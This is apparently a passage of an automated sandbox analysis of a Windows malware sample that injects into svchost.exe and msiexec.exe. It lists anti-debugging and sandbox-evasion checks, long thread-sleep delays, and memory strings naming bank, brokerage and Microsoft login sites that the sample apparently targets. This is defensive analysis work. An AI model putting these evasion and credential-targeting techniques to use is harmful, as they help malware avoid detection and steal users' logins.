            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041CCFF push ds; ret | 2_2_0041CD20
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004034B0 push eax; ret | 2_2_004034B2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A6DB push eax; retf | 2_2_0041A6DD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C7D3 push esp; retf | 2_2_0042C85F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx | 2_2_036309B6
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0420D42B push esi; retf | 3_2_0420D42C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0420F40F push esi; retf | 3_2_0420F411
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0421D414 push edi; ret | 3_2_0421D41F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_042104EC push edx; ret | 3_2_042104FB
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0420C5F9 push ds; iretd | 3_2_0420C61F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0420C604 push ds; iretd | 3_2_0420C61F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0420C677 push ds; iretd | 3_2_0420C61F
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_04215770 push ds; ret | 3_2_04215791
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_042178D0 push ds; retf | 3_2_042178D9
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0421314C push eax; retf | 3_2_0421314E
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_042179E3 push edi; iretd | 3_2_04217A0A
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_0421328B pushfd ; iretd | 3_2_0421328C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_04210BD8 push ecx; retf | 3_2_04210BD9
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 3_2_06A3AE9C pushfd ; iretd | 3_2_06A3AE9D
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F3F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00F3F98E
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00FB1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_00FB1C41
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep | graph_0-98574
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | API/Special instruction interceptor: Address: 1163214
            Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160C3 rdtsc | 2_2_004160C3
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | API coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 2.4 %
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | TID: 5884 | Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | TID: 5884 | Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | TID: 5884 | Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | TID: 5884 | Thread sleep count: 50 > 30
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | TID: 5884 | Thread sleep time: -50000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe | TID: 1848 | Thread sleep count: 4400 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe | TID: 1848 | Thread sleep time: -8800000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe | TID: 1848 | Thread sleep count: 5572 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe | TID: 1848 | Thread sleep time: -11144000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00F8DBBE
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F5C2A2 FindFirstFileExW | 0_2_00F5C2A2
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F968EE FindFirstFileW,FindClose | 0_2_00F968EE
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00F9698F
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00F8D076
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00F8D3A9
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F99642
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F9979D
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00F99B2B
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F95C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00F95C97
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_0012BF20 FindFirstFileW,FindNextFileW,FindClose | 4_2_0012BF20
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00F242DE
            Source: 049zKJ78K.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 049zKJ78K.4.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: 049zKJ78K.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 049zKJ78K.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 049zKJ78K.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 049zKJ78K.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 049zKJ78K.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: firefox.exe, 00000006.00000002.2497621913.000001F87B5FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII,rP
            Source: 049zKJ78K.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 049zKJ78K.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 049zKJ78K.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 049zKJ78K.4.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 049zKJ78K.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 049zKJ78K.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 049zKJ78K.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 049zKJ78K.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 049zKJ78K.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 049zKJ78K.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 049zKJ78K.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 049zKJ78K.4.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 049zKJ78K.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4488167215.000000000109F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz0JDY
            Source: 049zKJ78K.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 0XLuA614VK.exe, 00000000.00000002.2047858943.0000000001354000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ewxQemUiEk5ZDVeUr-fg
            Source: 049zKJ78K.4.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
            Source: 049zKJ78K.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 049zKJ78K.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160C3 rdtsc | 2_2_004160C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417993 LdrLoadDll | 2_2_00417993
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F9EAA2 BlockInput | 0_2_00F9EAA2
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00F52622
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00F242DE
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F44CE8 mov eax, dword ptr fs:[00000030h] | 0_2_00F44CE8
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_01163480 mov eax, dword ptr fs:[00000030h] | 0_2_01163480
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_011634E0 mov eax, dword ptr fs:[00000030h] | 0_2_011634E0
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_01161E70 mov eax, dword ptr fs:[00000030h] | 0_2_01161E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h] | 2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] | 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] | 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] | 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] | 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h] | 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] | 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] | 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h] | 2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h] | 2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h] | 2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] | 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h] | 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] | 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] | 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] | 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] | 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] | 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h] | 2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h] | 2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] | 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h] | 2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h] | 2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] | 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] | 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] | 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] | 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h] | 2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h] | 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] | 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] | 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] | 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] | 2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] | 2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] | 2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
